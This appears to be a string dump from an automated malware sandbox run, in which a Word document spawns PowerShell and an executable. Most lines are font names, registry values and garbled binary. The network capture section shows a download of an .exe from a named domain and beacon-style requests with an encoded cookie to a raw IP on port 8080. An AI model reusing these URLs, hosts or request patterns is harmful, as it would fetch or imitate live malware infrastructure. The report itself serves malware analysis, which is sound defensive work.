(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
StringFileInfo
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
SysListView32
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
Translation
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
VS_VERSION_INFO
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
|*.bmp;*.cur;*.dib;*.emf;*.ico;*.wmf|
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
%windir%\tracing
Unicode based on Runtime Data
(powershell.exe
)
ConsoleTracingMask
Unicode based on Runtime Data
(powershell.exe
)
EnableConsoleTracing
Unicode based on Runtime Data
(powershell.exe
)
EnableFileTracing
Unicode based on Runtime Data
(powershell.exe
)
FileDirectory
Unicode based on Runtime Data
(powershell.exe
)
FileTracingMask
Unicode based on Runtime Data
(powershell.exe
)
LanguageList
Unicode based on Runtime Data
(powershell.exe
)
MaxFileSize
Unicode based on Runtime Data
(powershell.exe
)
�����
Ansi based on Runtime Data
(powershell.exe
)
��������
Ansi based on Runtime Data
(powershell.exe
)
���������
Ansi based on Runtime Data
(powershell.exe
)
������������
Ansi based on Runtime Data
(powershell.exe
)
�������������_����������������
Ansi based on Runtime Data
(powershell.exe
)
��������������
Ansi based on Runtime Data
(powershell.exe
)
��������������������
Ansi based on Runtime Data
(powershell.exe
)
��������������������������
Ansi based on Runtime Data
(powershell.exe
)
����������������������������
Ansi based on Runtime Data
(powershell.exe
)
������������������������������
Ansi based on Runtime Data
(powershell.exe
)
�����������������������������������������������������������?����������������������������������
Ansi based on Runtime Data
(powershell.exe
)
�����������������������������������������������������������?�������������������������������������
Ansi based on Runtime Data
(powershell.exe
)
�����������������������������������������������������������?��������������������������������������
Ansi based on Runtime Data
(powershell.exe
)
��������������������������������������������������������������������������������
Ansi based on Runtime Data
(powershell.exe
)
���������������������������������������������������������������������������������
Ansi based on Runtime Data
(powershell.exe
)
'_'-('?''
Ansi based on Image Processing
(screen_4.png)
./__Jt_Ähactt_IE_I___
Ansi based on Image Processing
(screen_4.png)
0_?_?_08_'_
Ansi based on Image Processing
(screen_4.png)
_________
Ansi based on Image Processing
(screen_4.png)
_a9_.1011
Ansi based on Image Processing
(screen_4.png)
_JJ_a__v_aat_n__n_a_tIla__a
Ansi based on Image Processing
(screen_4.png)
_v__crc_c_
Ansi based on Image Processing
(screen_4.png)
ea__ervenian
Ansi based on Image Processing
(screen_4.png)
Env,lap,_Lab,l_
Ansi based on Image Processing
(screen_4.png)
H__hl__ht
Ansi based on Image Processing
(screen_4.png)
J__';;J'_--T-
Ansi based on Image Processing
(screen_4.png)
Micrasoï¬
Ansi based on Image Processing
(screen_4.png)
Pi-'-lpli-nt
Ansi based on Image Processing
(screen_4.png)
R,c_p_,ntt_pac_p_antL__t
Ansi based on Image Processing
(screen_4.png)
r_a__aF_aIJ_
Ansi based on Image Processing
(screen_4.png)
rccn_pat______.
Ansi based on Image Processing
(screen_4.png)
UpJataLahal_
Ansi based on Image Processing
(screen_4.png)
*8dDbB[ b
Ansi based on PCAP Processing
(network.pcap)
0 0$0(0,0004080<0@0D0H0L0P0
Ansi based on PCAP Processing
(network.pcap)
0 0$0(0,0d0l0p0t0x0|0
Ansi based on PCAP Processing
(network.pcap)
0$PL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
0)R(ug0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
0-Nk0qQgU
Ansi based on PCAP Processing
(network.pcap)
0@0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
Ansi based on PCAP Processing
(network.pcap)
0\Omi-Nn0
Ansi based on PCAP Processing
(network.pcap)
0CQk0;bW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0f0D0j0D0
Ansi based on PCAP Processing
(network.pcap)
0f0D0j0D0_0
Ansi based on PCAP Processing
(network.pcap)
0f0D0j0D0h0M0k0h
Ansi based on PCAP Processing
(network.pcap)
0f0D0~0[0
Ansi based on PCAP Processing
(network.pcap)
0f0D0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
0f0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0F0h0W0f0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0F0h0W0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
0g0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
0g0o0j0O0
Ansi based on PCAP Processing
(network.pcap)
0k01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
0k0;bW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0k0g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
0k0W0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0L0'YM0Y0N0f0
Ansi based on PCAP Processing
(network.pcap)
0L0'YM0Y0N0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0L01XJTU0
Ansi based on PCAP Processing
(network.pcap)
0L0ckW0O0
Ansi based on PCAP Processing
(network.pcap)
0L0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
0L0D0c0q0D0g0Y0
Ansi based on PCAP Processing
(network.pcap)
0L0D0c0q0D0k0j0
Ansi based on PCAP Processing
(network.pcap)
0L0j0D0_0
Ansi based on PCAP Processing
(network.pcap)
0L0Nckg0Y0
Ansi based on PCAP Processing
(network.pcap)
0L0X[(WW0f0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0L0X[(WW0j0D0K0
Ansi based on PCAP Processing
(network.pcap)
0n0$PL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
0n0+g>\~0_0o0HQ-
Ansi based on PCAP Processing
(network.pcap)
0o0D0c0q0D0g0Y0
Ansi based on PCAP Processing
(network.pcap)
0pS7RW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0S0h0L0g0M0
Ansi based on PCAP Processing
(network.pcap)
0S0h0L0g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
0TL0ckW0D0K0i0F0K0
Ansi based on PCAP Processing
(network.pcap)
0TL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
0T~0_0o0ju
Ansi based on PCAP Processing
(network.pcap)
0W0f0D0~0[0
Ansi based on PCAP Processing
(network.pcap)
0W0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
0W0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
0Y0y0f0n0
Ansi based on PCAP Processing
(network.pcap)
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1
Ansi based on PCAP Processing
(network.pcap)
1 1$1(1,1014181<1@1D1|1
Ansi based on PCAP Processing
(network.pcap)
1 1X1`1d1h1l1p1t1x1|1
Ansi based on PCAP Processing
(network.pcap)
1,24282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
Ansi based on PCAP Processing
(network.pcap)
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2
Ansi based on PCAP Processing
(network.pcap)
2 2$2(2,2024282p2x2|2
Ansi based on PCAP Processing
(network.pcap)
2 3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3
Ansi based on PCAP Processing
(network.pcap)
2%2J2P2V2\2
Ansi based on PCAP Processing
(network.pcap)
3 3$3(3,3034383<3@3D3H3L3P3
Ansi based on PCAP Processing
(network.pcap)
3D3L3P3T3X3\3`3d3h3l3p3t3x3|3
Ansi based on PCAP Processing
(network.pcap)
4 4$4\4d4h4l4p4t4x4|4
Ansi based on PCAP Processing
(network.pcap)
4!4(4/464=4L4z4
Ansi based on PCAP Processing
(network.pcap)
484@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
Ansi based on PCAP Processing
(network.pcap)
5 5$5(5,5054585<5t5|5
Ansi based on PCAP Processing
(network.pcap)
5P5X5\5`5d5h5l5p5t5x5|5
Ansi based on PCAP Processing
(network.pcap)
6 6$6(6,6064686<6@6D6H6L6P6T6
Ansi based on PCAP Processing
(network.pcap)
6 6$6(6,606h6p6t6x6|6
Ansi based on PCAP Processing
(network.pcap)
7 7$7(7,7074787<7@7D7H7
Ansi based on PCAP Processing
(network.pcap)
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7
Ansi based on PCAP Processing
(network.pcap)
70888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
Ansi based on PCAP Processing
(network.pcap)
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8
Ansi based on PCAP Processing
(network.pcap)
8$9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9
Ansi based on PCAP Processing
(network.pcap)
9H9P9T9X9\9`9d9h9l9p9~5
Ansi based on PCAP Processing
(network.pcap)
: :$:(:`:h:l:p:t:x:|:
Ansi based on PCAP Processing
(network.pcap)
:<:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
Ansi based on PCAP Processing
(network.pcap)
; ;$;(;,;0;4;8;<;@;x;
Ansi based on PCAP Processing
(network.pcap)
; j9*&6B$
Ansi based on PCAP Processing
(network.pcap)
;T;\;`;d;h;l;p;t;x;|;
Ansi based on PCAP Processing
(network.pcap)
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<
Ansi based on PCAP Processing
(network.pcap)
< <$<(<,<0<4<}5
Ansi based on PCAP Processing
(network.pcap)
= =$=(=,=0=4=8=<=@=D=H=L=
Ansi based on PCAP Processing
(network.pcap)
=$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=
Ansi based on PCAP Processing
(network.pcap)
=4><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
Ansi based on PCAP Processing
(network.pcap)
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>
Ansi based on PCAP Processing
(network.pcap)
>(?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
Ansi based on PCAP Processing
(network.pcap)
?L?T?X?\?`?d?h?l?p?t?x?|?
Ansi based on PCAP Processing
(network.pcap)
[g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
[W0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
_CQW0j0D0
Ansi based on PCAP Processing
(network.pcap)
_CQW0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
_g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
_L0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
_L0ckW0O0j0D0
Ansi based on PCAP Processing
(network.pcap)
_L0ckW0O0}5
Ansi based on PCAP Processing
(network.pcap)
_peL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
AttachConsole
Ansi based on PCAP Processing
(network.pcap)
a}W0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
b'YW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
bg0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
bk01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
Bold Italic
Ansi based on PCAP Processing
(network.pcap)
bW0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
bW0f0O0`0U0D0(
Ansi based on PCAP Processing
(network.pcap)
c'`n0j0D0
Ansi based on PCAP Processing
(network.pcap)
ck01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
ckW0O0j0D0
Ansi based on PCAP Processing
(network.pcap)
D0c0q0D0k0
Ansi based on PCAP Processing
(network.pcap)
d\OCQk0;bY0
Ansi based on PCAP Processing
(network.pcap)
d\Ok01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
ek01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
eL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
eW0D0TMRg0
Ansi based on PCAP Processing
(network.pcap)
eW0f0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
eW0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
eW0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
e~0_0o0JRd
Ansi based on PCAP Processing
(network.pcap)
FindFirstFileNameTransactedW
Ansi based on PCAP Processing
(network.pcap)
fo0Y0y0f01Y
Ansi based on PCAP Processing
(network.pcap)
g0Y0L0S0n0
Ansi based on PCAP Processing
(network.pcap)
GET / HTTP/1.1Cookie: 22986=YfPsLfSbd4Y/yDt9dkvBSyvzDiRk06hQ5kQKootMxRN16gKf7UDw5xeHQLGa+63Wa0LEVngjmjKQ6hEk5Dzv7Z6dLgr1u/GUPvPdvLwQwpGMoAqqBHs1nd2IkkR1JLMCqAsQ9a/GfLtFsCWc5Ht5U5YctPH0LQcsHMl8hpOvk3qoq5Z3KA42kojnnkoWCvXUDeTyBS/rUgviG4oaBZKYIO7Mrw4KazYAWAVZtMGA7qrGrnyrb/DMu81dPHWovrDOa2smKTNrTdvKCagZSdJhgFgqJy1JZwHDpBSiuiKgmzgULEjmMZAZ7l8UR91gAP9iPPkT+vCJ8sEKv4r6Rs4AmisCKCx8Xb1TT1c6T+yoa+rTHauO808jGdH+om/jDqXJYzas5zuOKxkZ3YIL3GpCjMqhZEVkext9KubxIwe6Ww8zbnjIUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 81.21.67.85:8080Connection: Keep-AliveCache-Control: no-cache
Ansi based on PCAP Processing
(network.pcap)
GET /76j4qo/ HTTP/1.1Host: ifcingenieria.clConnection: Keep-Alive{5
Ansi based on PCAP Processing
(network.pcap)
HTTP/1.1 200 OKDate: Thu, 17 May 2018 07:55:38 GMTServer: ApacheX-Powered-By: PHP/5.5.36Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheContent-Disposition: attachment; filename="14101.exe"Content-Transfer-Encoding: binaryKeep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: application/octet-stream3a000MZ
Ansi based on PCAP Processing
(network.pcap)
HTTP/1.1 200 OKServer: nginxDate: Thu, 17 May 2018 07:56:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 132Connection: keep-alive
Ansi based on PCAP Processing
(network.pcap)
hW0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
i"}W0~0Y0
Ansi based on PCAP Processing
(network.pcap)
ifcingenieria
Ansi based on PCAP Processing
(network.pcap)
k01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
k0ckW0O0j0D0
Ansi based on PCAP Processing
(network.pcap)
KERNEL32.dll
Ansi based on PCAP Processing
(network.pcap)
kwrhWEj#@hw
Ansi based on PCAP Processing
(network.pcap)
n0%Rn0MOn
Ansi based on PCAP Processing
(network.pcap)
nJ;e/aS.+
Ansi based on PCAP Processing
(network.pcap)
Nk0&Ny0f0h
Ansi based on PCAP Processing
(network.pcap)
O(u-Nn0_0
Ansi based on PCAP Processing
(network.pcap)
O(u-N~0_0o0
Ansi based on PCAP Processing
(network.pcap)
O(ug0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
O(uW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
O0S0h0k01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
oG;e0ZS.,t
Ansi based on PCAP Processing
(network.pcap)
Ok01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
OX[g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
OX[k01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
OX[W0f0CQn0
Ansi based on PCAP Processing
(network.pcap)
OX[W0j0D0
Ansi based on PCAP Processing
(network.pcap)
OX[W0~0Y0
Ansi based on PCAP Processing
(network.pcap)
OX[W0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
PSPUBWS-PC
Ansi based on PCAP Processing
(network.pcap)
QEhjejeher
Ansi based on PCAP Processing
(network.pcap)
QW0L0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
R\OW0j0D0
Ansi based on PCAP Processing
(network.pcap)
RemoveMenu
Ansi based on PCAP Processing
(network.pcap)
Rk01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
rKak0;bW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
rKak0;bY0(
Ansi based on PCAP Processing
(network.pcap)
RL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
RrRW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
RW0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
Sg0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
Sk0&Ny0f0h
Ansi based on PCAP Processing
(network.pcap)
SL0Nckg0Y0
Ansi based on PCAP Processing
(network.pcap)
T$D;D$4w\
Ansi based on PCAP Processing
(network.pcap)
Tc0f0D0j0D0
Ansi based on PCAP Processing
(network.pcap)
USER32.dll
Ansi based on PCAP Processing
(network.pcap)
uW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
W0f0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
W0f0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
W0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
W0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
wekjwHjEJ
Ansi based on PCAP Processing
(network.pcap)
x0n0Y0y0f0n0Y
Ansi based on PCAP Processing
(network.pcap)
Yg0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
YY0N0~0Y0
Ansi based on PCAP Processing
(network.pcap)
{W0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
}k01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
~0g0n0peW[
Ansi based on PCAP Processing
(network.pcap)
~0g0n0tepe
Ansi based on PCAP Processing
(network.pcap)
/n "C:\02vPLpWc.doc"
Ansi based on Process Commandline
(WINWORD.EXE)
019C826E445A4649A5B00BF08FCC4EEE
Unicode based on Runtime Data
(WINWORD.EXE
)
@Arial Unicode MS
Unicode based on Runtime Data
(WINWORD.EXE
)
@BatangChe
Unicode based on Runtime Data
(WINWORD.EXE
)
@DFKai-SB
Unicode based on Runtime Data
(WINWORD.EXE
)
@DotumChe
Unicode based on Runtime Data
(WINWORD.EXE
)
@FangSong
Unicode based on Runtime Data
(WINWORD.EXE
)
@GulimChe
Unicode based on Runtime Data
(WINWORD.EXE
)
@GungsuhChe
Unicode based on Runtime Data
(WINWORD.EXE
)
@Malgun Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
@Meiryo UI
Unicode based on Runtime Data
(WINWORD.EXE
)
@Microsoft JhengHei
Unicode based on Runtime Data
(WINWORD.EXE
)
@Microsoft YaHei
Unicode based on Runtime Data
(WINWORD.EXE
)
@MingLiU-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
@MingLiU_HKSCS
Unicode based on Runtime Data
(WINWORD.EXE
)
@MingLiU_HKSCS-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
@MS Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
@MS Mincho
Unicode based on Runtime Data
(WINWORD.EXE
)
@MS PGothic
Unicode based on Runtime Data
(WINWORD.EXE
)
@MS PMincho
Unicode based on Runtime Data
(WINWORD.EXE
)
@MS UI Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
@PMingLiU
Unicode based on Runtime Data
(WINWORD.EXE
)
@PMingLiU-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
@SimSun-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\
Unicode based on Runtime Data
(WINWORD.EXE
)
[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\New Microsoft Word Document.docx
Unicode based on Runtime Data
(WINWORD.EXE
)
[F00000000][T01D3EDB4825FD0D0][O00000000]*C:\
Unicode based on Runtime Data
(WINWORD.EXE
)
[F00000000][T01D3EDB482615770][O00000000]*C:\02vPLpWc.doc
Unicode based on Runtime Data
(WINWORD.EXE
)
`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data
(WINWORD.EXE
)
`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data
(WINWORD.EXE
)
Agency FB
Unicode based on Runtime Data
(WINWORD.EXE
)
AgentAnim
Unicode based on Runtime Data
(WINWORD.EXE
)
Algerian
Unicode based on Runtime Data
(WINWORD.EXE
)
Angsana New
Unicode based on Runtime Data
(WINWORD.EXE
)
AngsanaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
Aparajita
Unicode based on Runtime Data
(WINWORD.EXE
)
Arabic Typesetting
Unicode based on Runtime Data
(WINWORD.EXE
)
Arial Black
Unicode based on Runtime Data
(WINWORD.EXE
)
Arial Narrow
Unicode based on Runtime Data
(WINWORD.EXE
)
Arial Rounded MT Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
Arial Unicode MS
Unicode based on Runtime Data
(WINWORD.EXE
)
AutoDetect
Unicode based on Runtime Data
(WINWORD.EXE
)
Baskerville Old Face
Unicode based on Runtime Data
(WINWORD.EXE
)
BatangChe
Unicode based on Runtime Data
(WINWORD.EXE
)
Bauhaus 93
Unicode based on Runtime Data
(WINWORD.EXE
)
Berlin Sans FB
Unicode based on Runtime Data
(WINWORD.EXE
)
Berlin Sans FB Demi
Unicode based on Runtime Data
(WINWORD.EXE
)
Bernard MT Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
Blackadder ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Bodoni MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Bodoni MT Black
Unicode based on Runtime Data
(WINWORD.EXE
)
Bodoni MT Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
Bodoni MT Poster Compressed
Unicode based on Runtime Data
(WINWORD.EXE
)
Book Antiqua
Unicode based on Runtime Data
(WINWORD.EXE
)
Bookman Old Style
Unicode based on Runtime Data
(WINWORD.EXE
)
Bookshelf Symbol 7
Unicode based on Runtime Data
(WINWORD.EXE
)
Bradley Hand ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Britannic Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
Browallia New
Unicode based on Runtime Data
(WINWORD.EXE
)
BrowalliaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
Brush Script MT
Unicode based on Runtime Data
(WINWORD.EXE
)
CAGFiles
Unicode based on Runtime Data
(WINWORD.EXE
)
Californian FB
Unicode based on Runtime Data
(WINWORD.EXE
)
Calisto MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Cambria Math
Unicode based on Runtime Data
(WINWORD.EXE
)
Castellar
Unicode based on Runtime Data
(WINWORD.EXE
)
Century Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
Century Schoolbook
Unicode based on Runtime Data
(WINWORD.EXE
)
Colonna MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Comic Sans MS
Unicode based on Runtime Data
(WINWORD.EXE
)
Constantia
Unicode based on Runtime Data
(WINWORD.EXE
)
Cooper Black
Unicode based on Runtime Data
(WINWORD.EXE
)
Copperplate Gothic Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
Copperplate Gothic Light
Unicode based on Runtime Data
(WINWORD.EXE
)
Cordia New
Unicode based on Runtime Data
(WINWORD.EXE
)
CordiaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
Courier New
Unicode based on Runtime Data
(WINWORD.EXE
)
Curlz MT
Unicode based on Runtime Data
(WINWORD.EXE
)
DFKai-SB
Unicode based on Runtime Data
(WINWORD.EXE
)
DilleniaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
DokChampa
Unicode based on Runtime Data
(WINWORD.EXE
)
DotumChe
Unicode based on Runtime Data
(WINWORD.EXE
)
Edwardian Script ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Elephant
Unicode based on Runtime Data
(WINWORD.EXE
)
Engravers MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Eras Bold ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Eras Demi ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Eras Light ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Eras Medium ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Estrangelo Edessa
Unicode based on Runtime Data
(WINWORD.EXE
)
EucrosiaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
Euphemia
Unicode based on Runtime Data
(WINWORD.EXE
)
EXCELFiles
Unicode based on Runtime Data
(WINWORD.EXE
)
Felix Titling
Unicode based on Runtime Data
(WINWORD.EXE
)
FontInfoCacheW
Unicode based on Runtime Data
(WINWORD.EXE
)
Footlight MT Light
Unicode based on Runtime Data
(WINWORD.EXE
)
Franklin Gothic Book
Unicode based on Runtime Data
(WINWORD.EXE
)
Franklin Gothic Demi
Unicode based on Runtime Data
(WINWORD.EXE
)
Franklin Gothic Demi Cond
Unicode based on Runtime Data
(WINWORD.EXE
)
Franklin Gothic Heavy
Unicode based on Runtime Data
(WINWORD.EXE
)
Franklin Gothic Medium
Unicode based on Runtime Data
(WINWORD.EXE
)
Franklin Gothic Medium Cond
Unicode based on Runtime Data
(WINWORD.EXE
)
FrankRuehl
Unicode based on Runtime Data
(WINWORD.EXE
)
FreesiaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
Freestyle Script
Unicode based on Runtime Data
(WINWORD.EXE
)
French Script MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Gill Sans MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Gill Sans MT Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
Gill Sans MT Ext Condensed Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
Gill Sans Ultra Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
Gill Sans Ultra Bold Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
Gloucester MT Extra Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
Goudy Old Style
Unicode based on Runtime Data
(WINWORD.EXE
)
Goudy Stout
Unicode based on Runtime Data
(WINWORD.EXE
)
Grammar & Style
Unicode based on Runtime Data
(WINWORD.EXE
)
Grammar Only
Unicode based on Runtime Data
(WINWORD.EXE
)
GulimChe
Unicode based on Runtime Data
(WINWORD.EXE
)
GungsuhChe
Unicode based on Runtime Data
(WINWORD.EXE
)
Haettenschweiler
Unicode based on Runtime Data
(WINWORD.EXE
)
Harlow Solid Italic
Unicode based on Runtime Data
(WINWORD.EXE
)
Harrington
Unicode based on Runtime Data
(WINWORD.EXE
)
High Tower Text
Unicode based on Runtime Data
(WINWORD.EXE
)
Imprint MT Shadow
Unicode based on Runtime Data
(WINWORD.EXE
)
Informal Roman
Unicode based on Runtime Data
(WINWORD.EXE
)
IntranetName
Unicode based on Runtime Data
(WINWORD.EXE
)
Iskoola Pota
Unicode based on Runtime Data
(WINWORD.EXE
)
JasmineUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
Jokerman
Unicode based on Runtime Data
(WINWORD.EXE
)
Juice ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Khmer UI
Unicode based on Runtime Data
(WINWORD.EXE
)
KodchiangUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
Kristen ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Kunstler Script
Unicode based on Runtime Data
(WINWORD.EXE
)
LastPurgeTime
Unicode based on Runtime Data
(WINWORD.EXE
)
Leelawadee
Unicode based on Runtime Data
(WINWORD.EXE
)
Levenim MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Bright
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Calligraphy
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Console
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Fax
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Handwriting
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Sans
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Sans Typewriter
Unicode based on Runtime Data
(WINWORD.EXE
)
Lucida Sans Unicode
Unicode based on Runtime Data
(WINWORD.EXE
)
Maiandra GD
Unicode based on Runtime Data
(WINWORD.EXE
)
Malgun Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
Matura MT Script Capitals
Unicode based on Runtime Data
(WINWORD.EXE
)
Max Display
Unicode based on Runtime Data
(WINWORD.EXE
)
Meiryo UI
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft Himalaya
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft JhengHei
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft New Tai Lue
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft PhagsPa
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft Sans Serif
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft Tai Le
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft Uighur
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft Word
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft YaHei
Unicode based on Runtime Data
(WINWORD.EXE
)
Microsoft Yi Baiti
Unicode based on Runtime Data
(WINWORD.EXE
)
MingLiU-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
MingLiU_HKSCS
Unicode based on Runtime Data
(WINWORD.EXE
)
MingLiU_HKSCS-ExtB
